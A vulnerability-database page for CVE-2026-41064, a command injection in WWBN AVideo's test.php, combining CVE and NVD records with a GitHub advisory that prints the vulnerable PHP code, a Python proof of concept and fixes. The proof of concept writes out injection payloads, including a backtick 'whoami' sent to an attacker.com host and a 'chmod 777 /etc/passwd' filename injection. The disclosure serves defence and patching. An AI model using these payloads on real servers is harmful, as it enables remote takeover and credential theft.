Vulnerability-Lookup

CVE-2026-41064 (GCVE-0-2026-41064)

Vulnerability from cvelistv5 – Published: 2026-04-21 23:04 – Updated: 2026-04-22 18:09

Title

AVideo has an incomplete fix for CVE-2026-33502 (Command Injection)

Summary

WWBN AVideo is an open source video platform. In versions up to and including 29.0, an incomplete fix for AVideo's `test.php` adds `escapeshellarg` for wget but leaves the `file_get_contents` and `curl` code paths unsanitized, and the URL validation regex `/^http/` accepts strings like `httpevil[.]com`. Commit 78bccae74634ead68aa6528d631c9ec4fd7aa536 contains an updated fix.

Severity ?

9.3 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_MISC
	https://github.com/WWBN/AVideo/commit/1e6cf03e93b…	x_refsource_MISC
	https://github.com/WWBN/AVideo/commit/78bccae7463…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 29.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-41064",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-22T18:09:16.244619Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-22T18:09:42.398Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 29.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, an incomplete fix for AVideo\u0027s `test.php` adds `escapeshellarg` for wget but leaves the `file_get_contents` and `curl` code paths unsanitized, and the URL validation regex `/^http/` accepts strings like `httpevil[.]com`. Commit 78bccae74634ead68aa6528d631c9ec4fd7aa536 contains an updated fix."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-21T23:04:32.047Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pq8p-wc4f-vg7j",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pq8p-wc4f-vg7j"
        },
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/1e6cf03e93b5a5318204b010ea28440b0d9a5ab3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/1e6cf03e93b5a5318204b010ea28440b0d9a5ab3"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/78bccae74634ead68aa6528d631c9ec4fd7aa536",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/78bccae74634ead68aa6528d631c9ec4fd7aa536"
        }
      ],
      "source": {
        "advisory": "GHSA-pq8p-wc4f-vg7j",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo has an incomplete fix for CVE-2026-33502 (Command Injection)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-41064",
    "datePublished": "2026-04-21T23:04:32.047Z",
    "dateReserved": "2026-04-16T16:43:03.173Z",
    "dateUpdated": "2026-04-22T18:09:42.398Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-41064",
      "date": "2026-04-23",
      "epss": "0.00032",
      "percentile": "0.09407"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-41064\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-22T00:16:28.187\",\"lastModified\":\"2026-04-22T21:23:52.620\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions up to and including 29.0, an incomplete fix for AVideo\u0027s `test.php` adds `escapeshellarg` for wget but leaves the `file_get_contents` and `curl` code paths unsanitized, and the URL validation regex `/^http/` accepts strings like `httpevil[.]com`. Commit 78bccae74634ead68aa6528d631c9ec4fd7aa536 contains an updated fix.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N\",\"baseScore\":9.3,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/1e6cf03e93b5a5318204b010ea28440b0d9a5ab3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/commit/78bccae74634ead68aa6528d631c9ec4fd7aa536\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-pq8p-wc4f-vg7j\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41064\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-22T18:09:16.244619Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-22T18:09:36.932Z\"}}], \"cna\": {\"title\": \"AVideo has an incomplete fix for CVE-2026-33502 (Command Injection)\", \"source\": {\"advisory\": \"GHSA-pq8p-wc4f-vg7j\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 9.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 29.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-pq8p-wc4f-vg7j\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-pq8p-wc4f-vg7j\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/1e6cf03e93b5a5318204b010ea28440b0d9a5ab3\", \"name\": \"https://github.com/WWBN/AVideo/commit/1e6cf03e93b5a5318204b010ea28440b0d9a5ab3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/78bccae74634ead68aa6528d631c9ec4fd7aa536\", \"name\": \"https://github.com/WWBN/AVideo/commit/78bccae74634ead68aa6528d631c9ec4fd7aa536\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions up to and including 29.0, an incomplete fix for AVideo\u0027s `test.php` adds `escapeshellarg` for wget but leaves the `file_get_contents` and `curl` code paths unsanitized, and the URL validation regex `/^http/` accepts strings like `httpevil[.]com`. Commit 78bccae74634ead68aa6528d631c9ec4fd7aa536 contains an updated fix.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-21T23:04:32.047Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-41064\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-22T18:09:42.398Z\", \"dateReserved\": \"2026-04-16T16:43:03.173Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-21T23:04:32.047Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-41064

Vulnerability from fkie_nvd - Published: 2026-04-22 00:16 - Updated: 2026-04-22 21:23

Severity ?

9.3 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/1e6cf03e93b5a5318204b010ea28440b0d9a5ab3
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/78bccae74634ead68aa6528d631c9ec4fd7aa536
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-pq8p-wc4f-vg7j
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, an incomplete fix for AVideo\u0027s `test.php` adds `escapeshellarg` for wget but leaves the `file_get_contents` and `curl` code paths unsanitized, and the URL validation regex `/^http/` accepts strings like `httpevil[.]com`. Commit 78bccae74634ead68aa6528d631c9ec4fd7aa536 contains an updated fix."
    }
  ],
  "id": "CVE-2026-41064",
  "lastModified": "2026-04-22T21:23:52.620",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 9.3,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-22T00:16:28.187",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/commit/1e6cf03e93b5a5318204b010ea28440b0d9a5ab3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/commit/78bccae74634ead68aa6528d631c9ec4fd7aa536"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pq8p-wc4f-vg7j"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3fpm-8rjr-v5mc"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-PQ8P-WC4F-VG7J

Vulnerability from github – Published: 2026-04-14 23:27 – Updated: 2026-04-14 23:27

Summary

WWBN AVideo has an incomplete fix for CVE-2026-33502: Command Injection

Details

Summary

The incomplete fix for AVideo's test.php adds escapeshellarg for wget but leaves the file_get_contents and curl code paths unsanitized, and the URL validation regex /^http/ accepts strings like httpevil.com.

Affected Package

Ecosystem: Other
Package: AVideo
Affected versions: < commit 1e6cf03e93b5
Patched versions: >= commit 1e6cf03e93b5

Details

The vulnerable wget() function in plugin/Live/test.php:

function wget($url, $filename) {
    $cmd = "wget --tries=1 {$url} -O {$filename} --no-check-certificate";
    exec($cmd);
}

Neither $url nor $filename is passed through escapeshellarg(). The URL validation uses preg_match("/^http/", $url) which: - Does not require :// (matches httpevil.com) - Does not block shell metacharacters (;, backticks, $()) - Does not validate the URL is actually a URL

A payload like http://x; id > /tmp/pwned; echo passes the regex and injects arbitrary commands via the semicolons.

The fix adds escapeshellarg() for the wget path and an isAllowedStatsTestURL allowlist, but url_get_contents() (used by the same endpoint) still follows redirects without validation. The wget-specific fix does not protect the file_get_contents and curl code paths that handle the same user-supplied URL.

PoC

"""
CVE-2026-33502 - Command injection in AVideo plugin/Live/test.php

Tests REAL vulnerable code from:
  plugin/Live/test.php (commit pre-1e6cf03)

The vulnerable wget() function at the end of test.php:
  $cmd = "wget --tries=1 {$url} -O {$filename} --no-check-certificate";
  exec($cmd);

No escapeshellarg() is used on $url or $filename parameters.
The URL validation regex /^http/ is also weak (matches "httpevil.com").
"""

import re
import sys
import os
import subprocess

src_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'src')
src_content = open(os.path.join(src_dir, 'test.php')).read()

print("=" * 60)
print("CVE-2026-33502: AVideo Command Injection PoC (Real Source)")
print("=" * 60)
print()

has_weak_regex = bool(re.search(r'preg_match\("/\^http/"', src_content))
has_unsanitized_wget = 'wget --tries=1 {$url} -O {$filename}' in src_content
has_escapeshellarg = 'escapeshellarg' in src_content
has_exec = 'exec($cmd)' in src_content
has_auth_check = 'User::isAdmin()' in src_content

print("[*] Source: plugin/Live/test.php (pre-fix)")
print("[*] Weak URL regex /^http/: " + str(has_weak_regex))
print("[*] Unsanitized wget command: " + str(has_unsanitized_wget))
print("[*] escapeshellarg used: " + str(has_escapeshellarg))
print("[*] exec() used: " + str(has_exec))
print("[*] Authentication check: " + str(has_auth_check))
print()

def extract_wget_function():
    match = re.search(r'function wget\(.*?\n\}', src_content, re.DOTALL)
    if match:
        return match.group(0)
    return None

wget_func = extract_wget_function()
if wget_func:
    print("[*] Extracted real wget function:")
    for line in wget_func.split('\n'):
        print("    " + line)
    print()

def simulate_url_validation(url):
    if not url or url == "php://input":
        return False
    if not re.match(r"^http", url):
        return False
    return True

def simulate_vulnerable_wget_cmd(url, filename):
    cmd = f"wget --tries=1 {url} -O {filename} --no-check-certificate"
    return cmd

print("[*] Testing command injection payloads:")
print()

vuln_count = 0

payload = "http://x; id > /tmp/pwned; echo "
valid = simulate_url_validation(payload)
cmd = simulate_vulnerable_wget_cmd(payload, "/tmp/test123")
print(f"  Payload: {payload}")
print(f"  Passes regex: {valid}")
print(f"  Generated command: {cmd}")
if valid and '; id' in cmd:
    print("  Result: COMMAND INJECTION - 'id' will execute")
    vuln_count += 1
print()

payload2 = "http://x`whoami`.attacker.com/test"
valid2 = simulate_url_validation(payload2)
cmd2 = simulate_vulnerable_wget_cmd(payload2, "/tmp/test456")
print(f"  Payload: {payload2}")
print(f"  Passes regex: {valid2}")
print(f"  Generated command: {cmd2}")
if valid2 and '`whoami`' in cmd2:
    print("  Result: COMMAND INJECTION via backticks")
    vuln_count += 1
print()

payload3 = "httpevil.attacker.com"
valid3 = simulate_url_validation(payload3)
print(f"  Payload: {payload3}")
print(f"  Passes regex: {valid3}")
if valid3:
    print("  Result: WEAK REGEX - 'httpevil.com' matches /^http/")
    vuln_count += 1
print()

cmd4 = simulate_vulnerable_wget_cmd("http://legit.com", "/tmp/test; chmod 777 /etc/passwd")
print(f"  Filename injection command: {cmd4}")
if '; chmod' in cmd4:
    print("  Result: FILENAME INJECTION possible")
    vuln_count += 1
print()

if not has_auth_check:
    vuln_count += 1
    print("[*] No authentication required to reach test.php")
print()

if vuln_count > 0 and has_unsanitized_wget:
    print("VULNERABILITY CONFIRMED")
    sys.exit(0)
else:
    print("VULNERABILITY NOT CONFIRMED")
    sys.exit(1)

Steps to reproduce: 1. git clone https://github.com/WWBN/AVideo /tmp/AVideo_test 2. cd /tmp/AVideo_test && git checkout 1e6cf03e93b5a5318204b010ea28440b0d9a5ab3~1 3. python3 poc.py

Expected output:

VULNERABILITY CONFIRMED
wget() uses unsanitized $url in shell command via exec(), and the URL regex /^http/ is too weak to prevent injection.

Impact

An unauthenticated attacker can achieve remote code execution on the AVideo server by sending a crafted URL to plugin/Live/test.php that injects shell commands via semicolons or backticks in the wget command line. This grants full server compromise -- the attacker can read database credentials, install backdoors, or pivot to internal systems.

Suggested Remediation

Use escapeshellarg() on both $url and $filename in the wget() function.
Strengthen the URL regex to require ^https?:// and reject shell metacharacters.
Add authentication (User::isAdmin()) to the test.php endpoint.
Apply escapeshellarg() consistently across all code paths (wget, curl, file_get_contents).

Severity ?

8.8 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T23:27:18Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe incomplete fix for AVideo\u0027s `test.php` adds `escapeshellarg` for wget but leaves the `file_get_contents` and `curl` code paths unsanitized, and the URL validation regex `/^http/` accepts strings like `httpevil.com`.\n\n### Affected Package\n\n- **Ecosystem:** Other\n- **Package:** AVideo\n- **Affected versions:** \u003c commit 1e6cf03e93b5\n- **Patched versions:** \u003e= commit 1e6cf03e93b5\n\n### Details\n\nThe vulnerable `wget()` function in `plugin/Live/test.php`:\n\n```php\nfunction wget($url, $filename) {\n    $cmd = \"wget --tries=1 {$url} -O {$filename} --no-check-certificate\";\n    exec($cmd);\n}\n```\n\nNeither `$url` nor `$filename` is passed through `escapeshellarg()`. The URL validation uses `preg_match(\"/^http/\", $url)` which:\n- Does not require `://` (matches `httpevil.com`)\n- Does not block shell metacharacters (`;`, backticks, `$()`)\n- Does not validate the URL is actually a URL\n\nA payload like `http://x; id \u003e /tmp/pwned; echo ` passes the regex and injects arbitrary commands via the semicolons.\n\nThe fix adds `escapeshellarg()` for the wget path and an `isAllowedStatsTestURL` allowlist, but `url_get_contents()` (used by the same endpoint) still follows redirects without validation. The wget-specific fix does not protect the `file_get_contents` and `curl` code paths that handle the same user-supplied URL.\n\n### PoC\n\n```python\n\"\"\"\nCVE-2026-33502 - Command injection in AVideo plugin/Live/test.php\n\nTests REAL vulnerable code from:\n  plugin/Live/test.php (commit pre-1e6cf03)\n\nThe vulnerable wget() function at the end of test.php:\n  $cmd = \"wget --tries=1 {$url} -O {$filename} --no-check-certificate\";\n  exec($cmd);\n\nNo escapeshellarg() is used on $url or $filename parameters.\nThe URL validation regex /^http/ is also weak (matches \"httpevil.com\").\n\"\"\"\n\nimport re\nimport sys\nimport os\nimport subprocess\n\nsrc_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), \u0027src\u0027)\nsrc_content = open(os.path.join(src_dir, \u0027test.php\u0027)).read()\n\nprint(\"=\" * 60)\nprint(\"CVE-2026-33502: AVideo Command Injection PoC (Real Source)\")\nprint(\"=\" * 60)\nprint()\n\nhas_weak_regex = bool(re.search(r\u0027preg_match\\(\"/\\^http/\"\u0027, src_content))\nhas_unsanitized_wget = \u0027wget --tries=1 {$url} -O {$filename}\u0027 in src_content\nhas_escapeshellarg = \u0027escapeshellarg\u0027 in src_content\nhas_exec = \u0027exec($cmd)\u0027 in src_content\nhas_auth_check = \u0027User::isAdmin()\u0027 in src_content\n\nprint(\"[*] Source: plugin/Live/test.php (pre-fix)\")\nprint(\"[*] Weak URL regex /^http/: \" + str(has_weak_regex))\nprint(\"[*] Unsanitized wget command: \" + str(has_unsanitized_wget))\nprint(\"[*] escapeshellarg used: \" + str(has_escapeshellarg))\nprint(\"[*] exec() used: \" + str(has_exec))\nprint(\"[*] Authentication check: \" + str(has_auth_check))\nprint()\n\ndef extract_wget_function():\n    match = re.search(r\u0027function wget\\(.*?\\n\\}\u0027, src_content, re.DOTALL)\n    if match:\n        return match.group(0)\n    return None\n\nwget_func = extract_wget_function()\nif wget_func:\n    print(\"[*] Extracted real wget function:\")\n    for line in wget_func.split(\u0027\\n\u0027):\n        print(\"    \" + line)\n    print()\n\ndef simulate_url_validation(url):\n    if not url or url == \"php://input\":\n        return False\n    if not re.match(r\"^http\", url):\n        return False\n    return True\n\ndef simulate_vulnerable_wget_cmd(url, filename):\n    cmd = f\"wget --tries=1 {url} -O {filename} --no-check-certificate\"\n    return cmd\n\nprint(\"[*] Testing command injection payloads:\")\nprint()\n\nvuln_count = 0\n\npayload = \"http://x; id \u003e /tmp/pwned; echo \"\nvalid = simulate_url_validation(payload)\ncmd = simulate_vulnerable_wget_cmd(payload, \"/tmp/test123\")\nprint(f\"  Payload: {payload}\")\nprint(f\"  Passes regex: {valid}\")\nprint(f\"  Generated command: {cmd}\")\nif valid and \u0027; id\u0027 in cmd:\n    print(\"  Result: COMMAND INJECTION - \u0027id\u0027 will execute\")\n    vuln_count += 1\nprint()\n\npayload2 = \"http://x`whoami`.attacker.com/test\"\nvalid2 = simulate_url_validation(payload2)\ncmd2 = simulate_vulnerable_wget_cmd(payload2, \"/tmp/test456\")\nprint(f\"  Payload: {payload2}\")\nprint(f\"  Passes regex: {valid2}\")\nprint(f\"  Generated command: {cmd2}\")\nif valid2 and \u0027`whoami`\u0027 in cmd2:\n    print(\"  Result: COMMAND INJECTION via backticks\")\n    vuln_count += 1\nprint()\n\npayload3 = \"httpevil.attacker.com\"\nvalid3 = simulate_url_validation(payload3)\nprint(f\"  Payload: {payload3}\")\nprint(f\"  Passes regex: {valid3}\")\nif valid3:\n    print(\"  Result: WEAK REGEX - \u0027httpevil.com\u0027 matches /^http/\")\n    vuln_count += 1\nprint()\n\ncmd4 = simulate_vulnerable_wget_cmd(\"http://legit.com\", \"/tmp/test; chmod 777 /etc/passwd\")\nprint(f\"  Filename injection command: {cmd4}\")\nif \u0027; chmod\u0027 in cmd4:\n    print(\"  Result: FILENAME INJECTION possible\")\n    vuln_count += 1\nprint()\n\nif not has_auth_check:\n    vuln_count += 1\n    print(\"[*] No authentication required to reach test.php\")\nprint()\n\nif vuln_count \u003e 0 and has_unsanitized_wget:\n    print(\"VULNERABILITY CONFIRMED\")\n    sys.exit(0)\nelse:\n    print(\"VULNERABILITY NOT CONFIRMED\")\n    sys.exit(1)\n\n```\n\n**Steps to reproduce:**\n1. `git clone https://github.com/WWBN/AVideo /tmp/AVideo_test`\n2. `cd /tmp/AVideo_test \u0026\u0026 git checkout 1e6cf03e93b5a5318204b010ea28440b0d9a5ab3~1`\n3. `python3 poc.py`\n\n**Expected output:**\n```\nVULNERABILITY CONFIRMED\nwget() uses unsanitized $url in shell command via exec(), and the URL regex /^http/ is too weak to prevent injection.\n```\n\n### Impact\n\nAn unauthenticated attacker can achieve remote code execution on the AVideo server by sending a crafted URL to `plugin/Live/test.php` that injects shell commands via semicolons or backticks in the wget command line. This grants full server compromise -- the attacker can read database credentials, install backdoors, or pivot to internal systems.\n\n### Suggested Remediation\n\n1. Use `escapeshellarg()` on both `$url` and `$filename` in the `wget()` function.\n2. Strengthen the URL regex to require `^https?://` and reject shell metacharacters.\n3. Add authentication (`User::isAdmin()`) to the `test.php` endpoint.\n4. Apply `escapeshellarg()` consistently across all code paths (wget, curl, file_get_contents).",
  "id": "GHSA-pq8p-wc4f-vg7j",
  "modified": "2026-04-14T23:27:18Z",
  "published": "2026-04-14T23:27:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pq8p-wc4f-vg7j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33502"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/1e6cf03e93b5a5318204b010ea28440b0d9a5ab3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "WWBN AVideo has an incomplete fix for CVE-2026-33502: Command Injection"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-41064 (GCVE-0-2026-41064)

FKIE_CVE-2026-41064

GHSA-PQ8P-WC4F-VG7J

Summary

Affected Package

Details

PoC

Impact

Suggested Remediation

Tags

Sightings

Nomenclature